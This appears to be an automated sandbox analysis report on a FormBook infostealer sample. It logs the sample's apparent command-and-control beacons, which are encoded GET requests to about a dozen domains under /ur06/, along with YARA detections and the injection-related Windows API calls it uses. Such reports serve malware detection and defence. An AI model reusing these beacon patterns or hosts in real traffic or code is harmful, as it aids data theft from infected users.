            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.maconanimalexterminator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1Host: www.pelisplusxd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.allismd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.central-car-sales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1Host: www.nolarapper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1Host: www.promanconsortium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1Host: www.profille-sarina23tammara.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.restaurantsilhouette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.bimetalthermostatksd.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:40:18 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000002.00000002.1030409117.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: WWAHost.exe, 00000006.00000002.1029486637.000000000250A000.00000004.00000020.sdmpString found in binary or memory: http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOC
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: WWAHost.exe, 00000006.00000002.1030966590.00000000037E2000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004181B0 NtCreateFile,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00418260 NtReadFile,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004182E0 NtClose,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004181AB NtCreateFile,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041825A NtReadFile,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004182DD NtClose,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011799A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011798F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011795D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011797A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011796E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011799D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011798A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A10 NtQuerySection,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179560 NtWriteFile,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011795F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A770 NtOpenThread,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179760 NtOpenProcess,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011796D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031996D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031996E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031999A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031995D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031997A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199560 NtWriteFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031999D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031995F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031998A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031998F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003381B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00338260 NtReadFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003382E0 NtClose,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00338390 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003381AB NtCreateFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033825A NtReadFile,
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003382DD NtClose,
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BAABC3
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA15E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA2F7B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA0EB8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4B18
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4B09
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA12A8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA1298
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA15D0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4D51
